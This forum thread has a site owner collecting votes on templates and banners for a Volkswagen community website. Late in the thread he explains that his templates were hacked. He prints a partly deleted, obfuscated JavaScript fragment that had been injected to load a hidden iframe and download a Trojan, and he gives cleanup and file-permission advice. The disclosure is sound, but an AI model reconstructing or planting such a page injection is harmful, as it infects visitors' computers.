xisto Community
vujsa

Website Review <vwone.com> Need A Lot Of Help

So my website is a mess. I thought I had a plan and got started and took a step back to see that something wasn't right. I couldn't figure out what was wrong until I got some very good advise. Now that I can see the problems, I hope to avoid making the same mistakes again so I'm asking for help now.

I have uploaded several possible templates that may work on the website if they are modified slightly. I need to choose a single template to use. I need volunteers to go browse the different templates that are available and vote on which is best.

I'll add more templates latter and hope to compare this round of template winners with the next round until I have the right template.

Once I have narrowed the list to about three templates, I'll modify each to fit the sites features and then ask for a final vote.

[/hr]

My website is a volkswagen Information and Community site found at:
vw.forum500.com
and
http://forums.xisto.com/no_longer_exists/

The second address simply forwards to the first address. I'll switch everything over to the new domain latter.

For more information about the site, here is the previous request for input.:
The Volkswage Site <vwone.com;

Thank you so much for any help you can give.

vujsa

I would go with skin: "vr_simpleportal" - It's a neat and nice designed theme, colors are nice, (but anway you could adjust them for your needs), theme has nice usage of fonts and uses very few images in backgrounds so your pages will load quicker. B)

From the templates you have there, I might've checked like 7 but, I have to say the one I got first (something green and white that looked if it was made in FP) that one was nasty. Soon enough I discovered the template chooser (VERY COOL Function, can you PM me on how to get it please???) and I liked the JavaBeam theme, and maybe the rhuk_planetfallI hope my opinion has been of help, because my site could be the next one on 'the chair' (when I finally finish it hehehe)

Hey vujsa i would like to cast my vote for zoolander cos i think that its a sleek look very silky smooth kinda like you B) and also has the high tech feel but not t busy at the same time. So can you put out the tourches of teh others on templateisland as we all know zoolander is gona be the survivor !!

OK, I think I got some real useful input from everyone about my website.

I think that I finally know what template I'm going to use. It isn't up yet because I have to modify it a little to suit my needs.

I have also been working possible web site banners to be displayed on my website instead of a traditional logo.

Here are my first attempts.:

001 - Red "light"moving in the background of the text:

Posted Image

002 - Rolling color change in the background of the text:

Posted Image

003 - Our new television channel :mellow: in the background of the text:

Posted Image

004 - Resized version of 003:

Posted Image

005 - New beetle moving in the background of the text:

Posted Image

006 - Nearly the same as 005 but more defined classic beetle and extra width added:

Posted Image

007 - Same as 006 but shorter

Posted Image

008 - Same as 007 but background from 001 - 003

Posted Image

009 - Same as 008 but shorter

Posted Image

Other than the resistance towards animated GIF's, any suggestions?

I'd also love to see what anyone else can come up with for my new banner. If you want to submit a banner for consideration, please do so. I have a few guidelines though.

Here is what I was hoping for:

Width: 600 to 700 pixels (635 px prefered)

Height: 150 to 200 pixels (150 px prefered)

Primary Colors: blue, gray

Images Included: Classic Volkswagen Beetle Hardtop (sedan)

Title Text: "VW One"

Description: "Your Volkwagen Information Resource."

Border: Optional

Text Effect: Rolling Color Change / Fade Effects (animated effect) - Perhapes Title Only

The images I've made are very much the type of banners I'm looking for. While there are many ways to design similar banners, little things make a big difference. Variations on the style are welcome as well.

vujsa

I vote for the one with the beetle moving in the background of the text. The others are good, but I like this one the best :mellow:.

I vote for the one with the beetle moving in the background of the text. The others are good, but I like this one the best :mellow:.

1064325644[/snapback]

Which one with the with the Beetle moving in the background, there are 5 of them above. I really liked you fliud CSS trial by the way, I think I'll spend some time studying your techniques.

Here are a few more renditions of the same style of banner in different shades.

010 - Same as 008 above but in aqua instead of blue:

Posted Image

011 - Same as 009 above but in aqua instead of blue:

Posted Image

012 - Same as 008 above but in dark-bluegray instead of blue:

Posted Image

013 - Same as 009 above but in dark-bluegray instead of blue:

Posted Image

Any thoughts?

vujsa

vujsa,

Very good banners - I like! Anyways, I was checking over your site, and I'll tell you, you should consider changing the default template. In my opinion, it is very poorly designed and the layout is bad. Thusly, that could cause a lessened impact on your site hits. For instance, I almost have back-off on continuing through the site with the default template you currently have uploaded. However, that is just my opinion and it certainly is not a harsh one; I just think your site would be improved with such a change.

OTHER THAN THAT, your site is good. Though I am in no way a fan of Volkswagon Beetle(s), those who may be would certainly find the site entertaining.

One other comment - you have a virus somehow uploaded onto your site; to explain, when your site loads, a window for the Trojan Virus pulls up via my AntiVirus software. The reason why I'm saying this is to also expound on the fact that I noticed some other user having the same problem. As a matter of fact, he posted his concern and if I find the post, I'll be sure to reference it for your use. Just be sure to rectify the problem and you'll be on your way!

Still, keep up the good work, and I hope your site kicks off!

Hmm...i don't have any problems of the sort whenever i go to the site though even after HTML_guru stressed on it. I've changed the options of my anti-virus program so that it asks my permission before letting any data out or into the computer. Nothing pops up on my behalf whenever i enter the website. Neither did anything pop-up before HTML_guru's reply. Does this trojan affect only some people?

The Downloader Trojan virus may have been downloaded when my site was access by people using Internet Explorer. Along with some other irritating things that I found after appearently being hacked, was that many of my templates had been modified. Since it was the templates that were modified, it effected the entire website so any of my pages would have caused Internet Explorer to download the virus. A single line of javascript was added to my templates that initiated a Java event that downloaded the virus. I wasn't able to find the problem until I also viewed my page with IE. McAffee Anti-Virus will quickly remove the virus. Norton has a bit more trouble with it but my definitions are a little out of date.

Here is a segment of the javascript that was added to my templates.
I have deleted various sections of the script to prevent it from being used again.

<script language="javascript" type="text/javascript">var k='?gly#vw|o::::DELETED_SECTION::::lw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%::::DELETED_SECTION::::s=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgw::::DELETED_SECTION::::k@3#pdujlqkhljkw@3#vfuroo::::DELETED_SECTION::::yA',t=0,h='';w::::DELETED_SECTION::::ength-1){h=h+String.fromCharC::::DELETED_SECTION::::deAt(t::::DELETED_SECTION::::ent.write(h);</script></body>

Anyway, if you find a similar javascript on your site and you didn't put it their, delete it.

Also, the only templates that I had any problems with were the ones which I changed the permissions on to edited online. If you want to prevent this type of activity on your site, be sure to denie public write permissions and edit your files locally and upload or use the file edit utility in the cPanel File Manager.

Sorry for any problems anyone has had. The site is now infection free.

[/hr]

HTML_Guru, I'm glad that you like the banners. Thanks a lot. My intention is to replace the current default template with a new one. That is the reason I designed the banners. I chose number 13 as the basis of my new template. Using that banner as a guide, I designed another banner that was much larger than the original. I aded various layers and effects to the image and cut into pieces that are placed in various places to form the bulk of the new template. I'm currently working on the rather large css that mambo uses.

You can see the new unfinished template at my virus free website by choosing the "vw_one" template in the template chooser.

http://forums.xisto.com/no_longer_exists/
http://ww2.forum500.com/?folio=9POR7JU99

techocian, I had already removed the code that caused the virus to download so you wouldn't have noticed. It has only been there for about a month I think so if you were there before then, it wouldn't have bothered you. Also, I see that you use FireFox 1.0.6 so it shouldn't have bothered you anyway. Thanks for visiting my site.

vujsa